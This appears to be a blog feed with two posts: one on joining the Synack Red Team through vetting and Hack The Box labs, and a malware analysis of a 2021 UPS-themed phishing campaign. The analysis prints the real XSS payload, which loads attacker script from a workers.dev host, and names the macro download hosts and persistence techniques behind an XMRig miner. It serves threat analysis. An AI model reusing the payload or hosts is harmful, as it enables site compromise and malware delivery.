<!--kg-card-end: markdown--><p><strong>Tip</strong>: Do you have a friend who is actively hunting on the platform? perhaps they could refer you? this may help with your application.</p><hr><h3 id="red-team-researcher-requirements-crowdsourced">RED TEAM RESEARCHER REQUIREMENTS CROWDSOURCED </h3><p>PENETRATION TESTING: RESEARCHER TRUST AND SKILL</p><p>Synack Red Team (SRT) researchers must pass through a rigorous vetting process that includes five intensive vetting stages. SRT applicants must pass through all stages before being fully onboarded; this ensures that researchers are both technically qualified and trustworthy. Synack&#x2019;s vetting process eliminates the majority of applicants with only ~10% fully passing through to the final on-boarding stage.</p><h3 id="synack-red-team-vetting-process">Synack Red Team Vetting Process</h3><hr><h3 id="front-end-screening-application-review">FRONT-END SCREENING: APPLICATION REVIEW</h3><p>VETTING STAGES: APPLICATION, RESUME REVIEW AND INTERVIEW</p><p>Following an initial triage of applications, qualified candidates undergo a behavioural interview. Behavioural interviews are performed in-person or via video by trained and designated members of Synack&#x2019;s Researcher Onboarding Team (ROT) to assess the candidate&#x2019;s integrity and suitability for membership. During the interview, the ROT will establish a score for the candidate&#x2019;s threshold for ethics, learn about candidate motivations and goals, and communicate Synack&#x2019;s stringent requirements and expectations.</p><h3 id="skill-assessment">SKILL ASSESSMENT </h3><p>VETTING STAGE: SKILLS TEST AND ASSESSMENT </p><p>Synack&#x2019;s assurance that only qualified researchers will engage with client assets is enabled by our skill assessment program. Consisting of a written and practical application component, each skill assessment is specific to a technical domain, such as web or mobile application or host-based testing. To ensure fidelity, skill assessments are internally created, maintained and administered. Written and practical components may be taken only once, and must be completed in a single session.</p><h3 id="trust-assessment">TRUST ASSESSMENT</h3><p>VETTING STAGES: BACKGROUND &amp; ID CHECKS, ACCEPTANCE &amp; MONITORING</p><p>Prior to onboarding, all researchers undergo a mandatory trust assessment consisting of background and identity verification and the following mandatory criminal background checks: </p><p>&#x2022; Global terrorism and sanctions list search </p><p>&#x2022; County criminal record history search (7-year) </p><p>&#x2022; Department of Justice sex offender records search </p><p>&#x2022; Federal Excluded Parties Listing System search A Social Security Number trace, including address history cross-referencing1 Once the researcher is admitted to the platform, they undergo a 45-day monitored qualifying period before being fully accepted into our program. </p><p>3.1 DoJ sex offender records search and Social Security Number trace are conducted for domestic candidates only.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/09/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1116" height="467" srcset="https://flaviu.io/content/images/size/w600/2021/09/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/09/image.png 1000w, https://flaviu.io/content/images/2021/09/image.png 1116w" sizes="(min-width: 720px) 720px"><figcaption>Synack Vetting Process Src: Synack</figcaption></figure><h3 id="what-are-the-challenges">What are the challenges?</h3><p>You will typically be given up to 20 challenges that involve most common modern vulnerabilities being exploited in the wild. For confidentiality reasons I cannot go into this subject as much as I&apos;d like to.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-15.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="900" height="500" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-15.png 600w, https://flaviu.io/content/images/2021/07/image-15.png 900w" sizes="(min-width: 720px) 720px"><figcaption>binary challenge</figcaption></figure><p>Once you complete your preferred route, you&apos;ll e-mail them and they will get back to you. </p><p>Aside proving your technical ability all the stages are just as important. You may have noticed Synack is very careful when picking their members.</p><p>Heads Up: You <strong><strong>cannot</strong> </strong>collaborate with anyone on this, you <strong>cannot </strong>ask hints online. If you plan to cheat, then how will you be able to find vulnerabilities on the platform? After all, this is a job interview and if found in wrong you will definitely not proceed.</p><h3 id="entry-point-2">Entry Point 2</h3><hr><h3 id="hack-the-box-method-a-and-method-b-">HACK THE BOX - (Method A and Method B).</h3><p><strong><u>Method A: Offshore</u></strong></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.hackthebox.eu/storage/press/synacktrack/offshore.jpg" class="kg-image" alt="Synack Red Team Member" loading="lazy"><figcaption>HackTheBox OffShore Pro Lab Src: HackTheBox</figcaption></figure><h3 id="what-is-offshore">WHAT IS OFFSHORE?</h3><hr><p>Assess, Gain, Pivot. Real-World Active Directory Simulation! </p><p>Offshore Pro Lab is an Active Directory lab that simulates the look and feel of a real-world corporate network. You are an agent tasked with exposing money laundering operations in an offshore international bank. As a real-world penetration tester, you need to assess the external perimeter, gain an internal foothold and pivot across multiple hosts and forests. <br>Users start from an external perspective and have to penetrate the &quot;DMZ&quot; and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab. To track progress, there are multiple flags planted along the way as well as a few side challenges not required to advance within the Active Directory environment. Players can submit flags to earn a place in the Offshore Hall of Fame and receive badges for various stages of completion.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-1.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1397" height="1152" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-1.png 1000w, https://flaviu.io/content/images/2021/07/image-1.png 1397w" sizes="(min-width: 720px) 720px"><figcaption>HackTheBox Offshore Pro Lab Src: HackTheBox</figcaption></figure><h3 id="who-is-offshore-for">Who is Offshore for?</h3><hr><p>Offshore Pro Lab has been designed to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned cybersecurity professionals as well as InfoSec hobbyists and even blue teamers; there is something for everyone. Players will pick up multiple new tricks and hacks, which can be immediately applied to real-world engagements or taken back to their organizations to help improve the overall security posture.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-4.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="558" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-4.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-4.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-4.png 1600w, https://flaviu.io/content/images/2021/07/image-4.png 2156w" sizes="(min-width: 720px) 720px"><figcaption>Offshore Penetration Tester HTB Src: HackTheBox</figcaption></figure><p>SKILLS / KNOWLEDGE</p><ul><li>Familiarity with modern tools and techniques used to perform Penetration Testing engagements</li><li>Working knowledge of Networking and Web Application Attacks</li><li>Working knowledge of Linux and Windows Operating Systems and Active Directory</li></ul><p>ATTITUDE / MENTALITY</p><ul><li>Patience and perseverance</li><li>Willingness to do extensive research</li><li>Accept that you might fail more times than you will succeed; it&apos;s part of the process</li></ul><h3 id="what-will-you-gain">What will you gain?</h3><hr><p>Are ready to develop and enhance your skills in network penetration testing?</p><p>Players will gain the opportunity to attack 17 hosts of various operating system types and versions to obtain 30 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. Some of the Red Team TTPs (Tools, Techniques, Procedures) players will learn include:</p><ul><li>Web Application Attacks</li><li>Enumeration</li><li>Exploiting Obscure and Real-World Active Directory Flaws</li><li>Local Privilege Escalation</li><li>Lateral Movement and Crossing Trust Boundaries</li><li>Evading Endpoint Protections</li><li>Reverse Engineering</li><li>Out-Of-The-Box Thinking</li></ul><p>Offshore Lab is not free, players that have completed Offshore will own a certificate of completion provided by Hack The Box.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-5.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="775" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-5.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-5.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-5.png 1600w, https://flaviu.io/content/images/2021/07/image-5.png 2174w" sizes="(min-width: 720px) 720px"><figcaption>Pricing Offshore Lab Src: HackTheBox</figcaption></figure><p>All Hack The Box players that successfully complete (100%) Offshore Pro Lab [Penetration Tester Level II] get one step closer to joining the Synack Red Team. All you need to do is complete Offshore within this timeframe and send an email to <strong>support@synack.com </strong>with the subject &quot;Offshore Completed&quot; including your official HTB certificate of completion.</p><hr><p><strong><u>Method B: Synack Red Team Track</u></strong></p><p>A great way to fast-track your application to join SRT through Hack The Box, the <a href="https://app.hackthebox.eu/tracks/8"><strong>Synack Red Team Track</strong></a>!</p><p>Have you discovered our newly announced <strong>Tracks</strong>? If not, let&#x2019;s cut straight to the chase and explore <a href="https://app.hackthebox.eu/tracks">Hack The Box Tracks</a> on the new platform.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1200" height="675" srcset="https://flaviu.io/content/images/size/w600/2021/08/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/image.png 1000w, https://flaviu.io/content/images/2021/08/image.png 1200w" sizes="(min-width: 720px) 720px"><figcaption>Synack Red Team Track Src: HackTheBox</figcaption></figure><p>One of them is the <a href="https://app.hackthebox.eu/tracks/8">Synack Track</a>, including <strong>7 HTB Machines and 7 HTB Challenges</strong>. Create beautiful exploit chains, master some of the most interesting web vulnerabilities, and prove your prowess in the specially curated Synack Red Team Track. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="791" srcset="https://flaviu.io/content/images/size/w600/2021/07/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image.png 1600w, https://flaviu.io/content/images/size/w2400/2021/07/image.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Synack Track on HackTheBox Src: HackTheBox</figcaption></figure><p>Due to some machines being retired that are part of the track, you will need a VIP subscription to be able to spawn these boxes.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/07/htb-cost.PNG" width="1584" height="1034" loading="lazy" alt="Synack Red Team Member" srcset="https://flaviu.io/content/images/size/w600/2021/07/htb-cost.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/07/htb-cost.PNG 1000w, https://flaviu.io/content/images/2021/07/htb-cost.PNG 1584w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/07/htb-cost-yearly.PNG" width="1582" height="1048" loading="lazy" alt="Synack Red Team Member" srcset="https://flaviu.io/content/images/size/w600/2021/07/htb-cost-yearly.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/07/htb-cost-yearly.PNG 1000w, https://flaviu.io/content/images/2021/07/htb-cost-yearly.PNG 1582w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>HackThe Box Subscription Cost Src: HackTheBox</figcaption></figure><p>As Ryan Rutan, Director of Community at Synack said &quot;We are very excited about this joint effort with Hack The Box as it will help many up and coming security professionals test their talents as a potential member of the Synack Red Team.</p><p>As a valued Hack The Box user, you have had the opportunity to test and improve your cyber security skills using the HTB training platform. Given your track record, we feel you have demonstrated the skills needed on the Synack Red Team to provide crowdsourced security testing.</p><p>Synack responsibly grows the SRT proportional to the opportunities that are available to the community. This ensures both an equitable, yet competitive, landscape that strives above all else to be fair and respectful to each SRT such that they can hack, learn and grow as security professionals. Synack leverages an application waitlist to ensure that growth is always strategically aligned in this regard.&quot;</p><h3 id="conclusion">Conclusion</h3><hr><p>I have been super excited to explore the platform, complete a few missions, find a few bugs, learn along the way and level UP! </p><p>So far I am just beginning to get used of how things are getting done, but see a print of my current stats.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/09/image-1.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1473" height="697" srcset="https://flaviu.io/content/images/size/w600/2021/09/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/09/image-1.png 1000w, https://flaviu.io/content/images/2021/09/image-1.png 1473w" sizes="(min-width: 720px) 720px"><figcaption>Stats. Src: Synack</figcaption></figure><p>If you decide this is for you, I wish you all the best on your journey! don&apos;t get demotivated if somebody says you can&apos;t do it. Instead accept it as a challenge, give your best, work hard and prove your worth.</p><p></p><!--kg-card-begin: markdown--><p>Sources:<br>
<a href="https://cdnm.synack.com/wp-content/uploads/2020/07/SRT-VettingRequirements-2019.pdf">Synack Requirements </a><br>
<a href="https://www.hackthebox.eu/newsroom/synack-red-team-track">HackTheBox Tracks</a></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The "Almost" Perfect Phishing C@mpaign]]></title><description><![CDATA[Let's talk about one of the most creative phishing campaigns. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain. ]]></description><link>https://flaviu.io/the-almost-perfect-phishing-campaign/</link><guid isPermaLink="false">6124fffae056bf37bb0e729a</guid><category><![CDATA[crypto]]></category><category><![CDATA[hacking]]></category><category><![CDATA[offensivesecurity]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Tue, 24 Aug 2021 18:56:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/08/maldoc.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/08/maldoc.jpg" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"><p>Let&apos;s talk about one of the most creative phishing campaigns I have ever seen to date. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain: Combining multiple vulnerabilities into a chain of attack that ends with the attacker in a privileged position on the targeted system.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/malware_pic.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1200" height="800" srcset="https://flaviu.io/content/images/size/w600/2021/08/malware_pic.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/malware_pic.jpg 1000w, https://flaviu.io/content/images/2021/08/malware_pic.jpg 1200w" sizes="(min-width: 720px) 720px"><figcaption>Malware</figcaption></figure><p><br>Since Covid19 began, the deliveries have surged drastically. Either for grocery shopping or something you have ordered, we all receive many parcels from various couriers. It is more common than before to receive text or e-mail notifications regarding status updates for your delivery. This could turn out badly with high chances of being Phished especially if you are already waiting on a delivery.</p><p>This phishing campaign is the most realistic because it leveraged a Cross-Site Scripting (XSS) vulnerability that existed in one of the courier&apos;s websites (UPS). In this case, this has enabled attackers to modify the page contents and turning it into a legitimate download page by injecting malicious HTML and JavaScript code.<br></p><p>This vulnerability allowed the attacker to distribute a weaponised document (docm) through a remote <a href="https://workers.cloudflare.com/">CloudFlare worker</a> but make it appear as though it was being downloaded directly from UPS.com.</p><p>When the document is downloaded and enabled, the macros will attempt to retrieve the next payload hosted on a 2ne domain controlled by the threat actor. At this stage it is uncertain what the final payload is supposed to do. The sky is the limit - Ransomware? Spyware? Botnet? We&apos;ll see.</p><p>The phishing campaign was first discovered on Aug 23, 2021, by security research Daniel Gallagher.</p><h2 id="dissecting-the-ups-phishing-scam"><strong>Dissecting the UPS phishing scam</strong></h2><hr><p>Screenshots of the e-mail:</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/phishing-email.jpg" width="1294" height="1115" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/phishing-email.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/phishing-email.jpg 1000w, https://flaviu.io/content/images/2021/08/phishing-email.jpg 1294w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/E9es0bwWYAcnLLW-1.jpg" width="2000" height="1813" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9es0bwWYAcnLLW-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9es0bwWYAcnLLW-1.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9es0bwWYAcnLLW-1.jpg 1600w, https://flaviu.io/content/images/size/w2400/2021/08/E9es0bwWYAcnLLW-1.jpg 2400w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Phishing Email UPS</figcaption></figure><p>This is a decent attempt 1:1 for the template! No spelling mistakes or weird hidden Click here URLs. Going back to my title and explain why I said &quot;Almost&quot;. This is because the email senders were not very convincing however good enough to pass SPF and DKIM protection, moreover because it leveraged XSS it did not break TLS validation: unitedparacelservice@paradanta.com As per Daniel&apos;s screenshots, however, I found another attempt coming from unitedparcelservice@tvamberg.de. The email sender is always the same one &quot;unitedparcelservice&quot; and the domains were random, safe to assume since both are using WordPress as the main content management system and perhaps were using weak passwords or out of date build/plugins they were hacked and that allowed the attacker to send bulk e-mails from their servers.<br>The tracking number is the vulnerable XSS URL on UPS.com website. This downloads a malicious document, pretending to be an invoice.<br>Let&apos;s have a look at the URL in question.</p><p>The email headers:</p><p>Sending address: unitedparcelservice @ paradanta[.]com<br>SMTP server: 212.227.126[.]134 / mout.kundenserver[.]de</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/E9f7XDAXIAICH8.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="2000" height="417" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9f7XDAXIAICH8.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9f7XDAXIAICH8.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9f7XDAXIAICH8.jpg 1600w, https://flaviu.io/content/images/2021/08/E9f7XDAXIAICH8.jpg 2276w" sizes="(min-width: 720px) 720px"><figcaption>Email Headers unitedparcelservice@paradanta.com</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Url Encoded:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&amp;loc=en_US%22%3E%3Cimg%20src%3D%22x%22%20onerror%3D%22Function%28atob%28%27JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ%3D%3D%27%29%29%28%29</code></p>
<p>Url Decoded:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&amp;loc=en_US&quot;&gt;&lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ==&apos;))()</code></p>
<p>Tidying up more:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=useless&amp;loc=en_US&quot;&gt;&lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;$.getScript(&apos;https://m.media-amazon.workers.dev/js&apos;)&apos;))()</code></p>
<!--kg-card-end: markdown--><p>Another base64 encoded string in the xref parameter that decodes to: 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;).</p><p>Super interesting, the threat actor was kind and left a comment in the base64 string that explains this string&apos;s purpose, which is to hide the query parameter that is appended at the end of the URL. Because the URL is so long the browsers will not show all of the URL and since the malicious XSS injection is at the end of the URL we can&apos;t see it.</p><p>XSS payload is executed right after the loc parameter and is: &lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ==&apos;))()</p><p>And yet another base64 string that decodes to $.getScript(&apos;<a href="https://m.media-amazon.workers.dev/js">https://m.media-amazon.workers.dev/js</a>&apos;) this is the worker script that gets loaded in the page UPS page. &lt;img src&gt; XSS payload is quite common so nothing fancy there, atob() function decodes a string of data that has been encoded using Base64 encoding. This function is commonly used to steal cookies, bypass black-lists and typically for blind XSS injections.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/cloudflare-worker-script-1.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1270" height="373" srcset="https://flaviu.io/content/images/size/w600/2021/08/cloudflare-worker-script-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/cloudflare-worker-script-1.jpg 1000w, https://flaviu.io/content/images/2021/08/cloudflare-worker-script-1.jpg 1270w" sizes="(min-width: 720px) 720px"><figcaption>CloudFlare Worker Script</figcaption></figure><p>The above script will modify the UPS page to display a message that a file will be downloaded.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/xss-ups-download-page-1.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1600" height="1204" srcset="https://flaviu.io/content/images/size/w600/2021/08/xss-ups-download-page-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/xss-ups-download-page-1.jpg 1000w, https://flaviu.io/content/images/2021/08/xss-ups-download-page-1.jpg 1600w" sizes="(min-width: 720px) 720px"><figcaption>UPS XSS Dowloading</figcaption></figure><p>This approach is truly what makes this campaign stand out. Victims of this campaign might be tricked in opening the invoice with less suspicion, thinking it is a genuine file from UPS.</p><h2 id="the-mysterious-fake-invoice-document"><strong>The mysterious fake &apos;Invoice&apos; document</strong></h2><hr><p><br>From the above worker script, there is another URL in the parameter named downloadUrl, this was available at <a href="https://m.media-amazon.workers">https://m.media-amazon.workers</a>[.]dev/documents/invoice_1Z7301XR1412220178</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/malicious-invoice-document.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1381" height="1030" srcset="https://flaviu.io/content/images/size/w600/2021/08/malicious-invoice-document.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/malicious-invoice-document.jpg 1000w, https://flaviu.io/content/images/2021/08/malicious-invoice-document.jpg 1381w" sizes="(min-width: 720px) 720px"><figcaption>Malicious Phishing Document</figcaption></figure><p>The downloaded document is named &apos;invoice_1Z7301XR1412220178.docm&apos; and claims to be a shipping invoice from UPS. Attention to the extension &apos;.docm&apos;. The macro names were &quot;Hehehe&quot; and &quot;hahahah&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/macros.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="610" height="477" srcset="https://flaviu.io/content/images/size/w600/2021/08/macros.jpg 600w, https://flaviu.io/content/images/2021/08/macros.jpg 610w"><figcaption>Phishing Document Macros</figcaption></figure><p>DOCM files are Microsoft Word 2007 or higher generated documents with the ability to run macros. It is similar to the DOCX file format but the ability to run macros makes it different from DOCX. Like DOCX, DOCM files can be store text, images, tables, shapes, charts and other contents. The capability to run macros make it easy to save time by executing the series of commands in the form of recorded actions for the automatic completion of a task. DOCM files can be opened and edited in Microsoft Word 2007 and above.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.07.png" width="1782" height="954" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.59.07.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1600w, https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1782w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.21.png" width="1143" height="1239" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.59.21.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/Screenshot-2021-08-23-at-09.59.21.png 1000w, https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.21.png 1143w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.58.47.png" width="787" height="403" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.58.47.png 600w, https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.58.47.png 787w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Analysing Phishing Document</figcaption></figure><p>Once enabled, the macros within the document will attempt to download another file that was located at <a href="https://divine-bar-3d75.visual-candy.workers">https://divine-bar-3d75.visual-candy.workers</a>[.]dev/blackhole.png.</p><p>This appears to be an image file, but is it?<br>This file was disguised as a picture (png format) and it&apos;s the first payload to be downloaded. It is very common for advanced threat actors to split their payloads in smaller chunks to avoid downloading large files, they also use random timeouts between downloading and execution of these scripts. This helps in avoiding detection by antiviruses. Typically you see an obfuscated PowerShell script that retrieves more files that make up to a final payload. </p><p>After some more digging, I stumbled on another CloudFlare domain that hosts more instructions to be executed on the victim&apos;s machine This was available at: <a href="https://cdn.globalsigncdn.workers">https://<a href="https://flaviu.io/the-almost-perfect-phishing-campaign/cdn.globalsigncdn.workers">cdn.globalsigncdn.workers</a></a>[.]dev</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/E9gqOmCX0AIOXmr.png" width="1824" height="479" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9gqOmCX0AIOXmr.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9gqOmCX0AIOXmr.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9gqOmCX0AIOXmr.png 1600w, https://flaviu.io/content/images/2021/08/E9gqOmCX0AIOXmr.png 1824w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/E9grrA3XsAURGM8.png" width="1781" height="821" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9grrA3XsAURGM8.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9grrA3XsAURGM8.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9grrA3XsAURGM8.png 1600w, https://flaviu.io/content/images/2021/08/E9grrA3XsAURGM8.png 1781w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>This sample contains so many TTPs: - Normal.dotm (persistence) - Run key to launch Normal.dotm via PS (persistence) by winword - Task scheduler to launch PS by winword - WMI Persistence, COM hijack and UAC bypass via SilentCleanup task. The final payloads &quot;appears&quot; to be linked to xmrig and its purpose is used for Cryptojacking.</p><p><br>Cryptojacking is a slow and tedious way to generate illicit income, that&#x2019;s why the actor is using botnet to infect as many devices as possible. Owning multiple systems for mining is not cheap, so attackers try the next best thing: To remotely compromise devices and use them for mining instead.</p><p><br>XMRig is a miner specifically, a type of threat used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform badly. Since XMRig uses additional system resources, taking these away from the victim.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/E9gwyTyWYAg2gIt.png" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="686" height="486" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9gwyTyWYAg2gIt.png 600w, https://flaviu.io/content/images/2021/08/E9gwyTyWYAg2gIt.png 686w"><figcaption>Final Payload</figcaption></figure><p>We can see they are using RandomX algorithm.</p><p><br>RandomX is the name of the new mining algorithm for Monero, the privacy coin whose objective is to keep the network protected from ASIC mining, allowing only mining per CPU.</p><h2 id="conclusion">Conclusion</h2><p></p><p>This phishing campaign illustrates the creativity and evolving techniques used by threat actors to distribute weaponised files convincingly.</p><p><br>While the E-Mail sender was a suspicious domain, the XSS vulnerability was actively exploited to make to appear as invoiced were legitimately downloaded from UPS, many people would have fallen for this scam. But did they? </p><p>That&apos;s a story for another article, perhaps if I can find where the mining workers are connecting and monitor that mining pool, I could come back with some statistics e.g. infection rate, money generated, time frame for this campaign. Game on!</p><p>I don&apos;t believe this to be APT gang however the chaining of vulnerabilities from an offensive security perspective was pretty ingenious.</p><p>I will continue digging for more information to find the source of this attack, if I find anything new I will update my blog 